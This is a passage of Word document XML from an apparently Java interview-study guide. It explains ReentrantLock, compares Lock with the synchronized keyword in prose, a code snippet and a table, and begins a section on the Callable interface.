          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that gives access to the longest-waiting thread:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D255C3" w14:textId="304F9CB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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ReentrantLock</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> fairLo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irness = true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123617C4"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7" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="403A7685" w14:textId="77777777"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CE4B95" w14:paraId="7D0C2171" w14:textId="77777777" w:rsidTr="00825CFF">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1DE1AEA0"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entrantLock</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00825CFF" w:rsidRPr="00CE4B95" w14:paraId="7772FD84" w14:textId="77777777" w:rsidTr="00825CFF">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="556BDDCA"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825CFF" w:rsidRPr="00CE4B95" w14:paraId="041D79FC" w14:textId="77777777" w:rsidTr="00825CFF">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1174990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187DC5B"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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00825CFF" w:rsidRPr="00CE4B95" w14:paraId="5BDD5C8C" w14:textId="77777777" w:rsidTr="00825CFF">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="79DD73D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083D05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timeout))</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00825CFF" w:rsidRPr="00CE4B95" w14:paraId="1DAFF2FD" w14:textId="77777777" w:rsidTr="00825CFF">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="56343BC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0BCFFD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lockInterruptibly())</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00825CFF" w:rsidRPr="00CE4B95" w14:paraId="49596301" w14:textId="77777777" w:rsidTr="00825CFF">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02098E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optional fair mode)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00825CFF" w:rsidRPr="00CE4B95" w14:paraId="1AC2F46E" w14:textId="77777777" w:rsidTr="00825CFF">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0537E73F"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37CEDF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unlock())</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4427DAA1"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8" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA40AED" w14:textId="77777777" w:rsidR="00014515" w:rsidRPr="00CE4B95" w:rsidRDefault="00014515" w:rsidP="00825CFF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47FB34F2" w14:textId="095AD4D8"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2AF55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when:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD9C084"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ore control</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> over the locking mechanism.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE5F8B7"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try-lock</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imed-lock</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ruptible-lock</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FA0AB7" w14:textId="029DDAF7" w:rsidR="00825CFF"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>fair thread scheduling</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for lock acquisition.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0605E870" w14:textId="56C02EEE" w:rsidR="00825CFF"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9" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="23456198" w14:textId="0F7963F0" w:rsidR="008666ED" w:rsidRPr="00CE4B95" w:rsidRDefault="008666ED" w:rsidP="008666ED">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="308" w:name="_Toc197867522"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between lock and synchronized?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="308"/>
    </w:p>
    <w:p w14:paraId="31D6E300" w14:textId="041336FE" w:rsidR="00F3137C" w:rsidRPr="00414276" w:rsidRDefault="00F3137C"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Basic Mechanism</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B295C1A"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7CBF4EA6"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is a keyword in Java used to create a synchronized block or method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52392439"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a simple and straightforward way to ensure that only one thread can execute a block of code at a time for a given object or class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752F8A87"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implicit and automatically acquires and releases the lock.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE2457E"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290D4B4"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is an interface in java.util.concurrent.locks package, implemented by classes like ReentrantLock.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393CE6BE"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and control compared to synchronized for handling locks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706CC97B"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requires explicit lock acquisition (lock()) and release (unlock()), offering more control over thread synchronization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187A784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ock Ownership</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6635A8"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45254865"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is implicitly tied to the object or class instance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425726C7"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Once a thread enters a synchronized block or method, it automatically holds the lock on the object or class until it exits that block/method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24778333"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7F10C61"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can be explicitly acquired and released. The lock is not automatically released unless the developer explicitly calls unlock().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15749858"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gives the developer finer control over the lock acquisition and release.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350516CD"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Reentrancy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F487E1B"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3B1A9E29"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33D66BE4"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Lock, which is a commonly used implementation of the Lock interface, also supports reentrancy. It allows the same thread to acquire the lock multiple times.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F5E158"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Timeout Mechanism</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD2CCCD"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407BA8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ynchronized does not provide a built-in way to specify a timeout for acquiring the lock.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078B8FA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thread will wait indefinitely if the lock is not available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1012E5DE"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4009343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feature helps avoid situations where threads wait indefinitely for a lock (deadlock avoidance).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF7AED0"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ibility</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BFA673D"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20574470"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are not interruptible while waiting for a lock in a synchronized block. If a thread is blocked on a synchronized lock, it cannot be interrupted until it acquires the lock or the block finishes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE935C8"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63C1233A"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s implemented using Lock can be interruptible. For instance, ReentrantLock has a method lockInterruptibly() that allows the thread to be interrupted while waiting to acquire the lock.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037165A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Multiple Locks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30557BA1"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5A749FA9"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only synchronize on a single object (instance or class level).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471DFDDF"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need to synchronize multiple locks, you'll have to manage them separately.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A127EE"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585C016"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allows for multiple locks on different resources or objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4726D1AD"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use multiple locks with the Lock interface, and handle their acquisition and release more explicitly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3746B0D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Read-Write Locks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFAFD86"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0DCDA38"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does not have built-in support for read-write locks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03AC5656"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multiple threads need to read a resource simultaneously while one thread writes, you have to manage this with additional logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0578D95E"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837A08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ReadWriteLock is a subclass of Lock that provides a more efficient way to handle read and write locks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59150E9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ultiple threads can hold a read lock simultaneously, while only one thread can hold the write lock.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DC8FC5"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Ease of Use</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038429C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0044378D"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simpler to use, as it is part of the language syntax. No need for explicit lock() or unlock() calls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5413D7CA"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a good choice for simple use cases where you just need to ensure mutual exclusion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184A49B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4FB81FE"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but requires more verbose code. You must manually acquire and release the lock (lock() and unlock()).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB6DF29"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better for more complex synchronization scenarios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559C2BB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Deadlock Prevention</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6345129F"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6BE8381F"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ile synchronized can lead to deadlocks (if multiple threads acquire locks in a circular fashion), there is no direct way to detect or prevent deadlocks with synchronized.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46BDFFB6"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207CC1A"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better control over lock management and can be used in conjunction with timeout and interruptible locks, which help prevent deadlocks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002DB2E7"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ome Lock implementations like ReentrantLock support features like trying to acquire a lock without blocking indefinitely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7434F6E6"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EDA24">
          <v:rect id="_x0000_i1870" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF0C21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Comparison</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6553F08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synchronized:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60407ADC"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synchronized void myMethod() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B62CC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7BDFB1F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FBC3ADC"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Lock:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032ADED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lock = new ReentrantLock();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB2CA0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lock.lock();  // Acquiring the lock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFE0B3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ry {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C00700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67D6A7D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finally {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F1C1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lock.unlock();  // Releasing the lock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458B5A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E15BAC3"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35BF0">
          <v:rect id="_x0000_i1871" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="72AA87A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857"/>
        <w:gridCol w:w="3619"/>
      </w:tblGrid>
      <w:tr w:rsidR="00414276" w:rsidRPr="00414276" w14:paraId="0BC798D8" w14:textId="77777777" w:rsidTr="00F3137C">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="13240AE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Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="68C43BE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ynchronized</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B3A0466"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Lock (ReentrantLock)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00414276" w:rsidRPr="00414276" w14:paraId="7F729940" w14:textId="77777777" w:rsidTr="00F3137C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="033F5D8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Acquisition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="30F2D8D5"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no need to call lock()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6F753B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lock()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00414276" w:rsidRPr="00414276" w14:paraId="4916E95C" w14:textId="77777777" w:rsidTr="00F3137C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A6E16D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Release</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C70552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automatically released</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C7ED750"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unlock()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00414276" w:rsidRPr="00414276" w14:paraId="6C23D538" w14:textId="77777777" w:rsidTr="00F3137C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0F034B5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terruptibility</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C6DDEB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E05B5F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lockInterruptibly()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00414276" w:rsidRPr="00414276" w14:paraId="6C1733D7" w14:textId="77777777" w:rsidTr="00F3137C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="35B7C09A"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out Support</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6564A6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14696E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tryLock()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00414276" w:rsidRPr="00414276" w14:paraId="279094E7" w14:textId="77777777" w:rsidTr="00F3137C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="512CB3D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cy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3AFC3F4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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A158B5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Lock</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00414276" w:rsidRPr="00414276" w14:paraId="3D3CB72A" w14:textId="77777777" w:rsidTr="00F3137C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="70AD303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eadlock Prevention</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F1FA71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 directly manageable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C58FF0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an be handled using tryLock()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00414276" w:rsidRPr="00414276" w14:paraId="5928EC29" w14:textId="77777777" w:rsidTr="00F3137C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5D4B974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ad-Write Lock Support</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="37F6800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0699E669"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ReadWriteLock</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00414276" w:rsidRPr="00414276" w14:paraId="4BD25188" w14:textId="77777777" w:rsidTr="00F3137C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11F8CC9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omplexity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="10CCB13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built into the language</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="17B6687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ore flexible, requires explicit handling</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5E8EA000"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0ADD40">
          <v:rect id="_x0000_i1872" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="209D18C9"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45CCA95E"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synchronized</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when you need a simple, easy-to-implement synchronization mechanism for basic mutual exclusion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578A4686"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Lock</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when you need more advanced features like timeouts, interruptibility, or complex scenarios where fine-grained control over synchronization is needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DDC5E7F" w14:textId="1E7E81DB" w:rsidR="008666ED"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3" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE75FA7" w14:textId="77777777" w:rsidR="004076D9" w:rsidRPr="00CE4B95" w:rsidRDefault="004076D9">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="309" w:name="_Toc197867523"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is Callable interface?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="309"/>
    </w:p>
    <w:p w14:paraId="1F5962BC" w14:textId="77777777" w:rsidR="008E1011" w:rsidRPr="00414276" w:rsidRDefault="00C0192E" w:rsidP="00414276">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Callable</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006F2B93" w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>is a functional interface used to execute concurrent tasks that return a result and can throw exceptions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5510E9" w14:textId="77777777" w:rsidR="008E1011" w:rsidRPr="00CE4B95" w:rsidRDefault="008E1011">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>It's most commonly used with ExecutorService and Future.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E8DEB0" w14:textId="67921C50" w:rsidR="00C0392A" w:rsidRPr="00CE4B95" w:rsidRDefault="00C0392A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
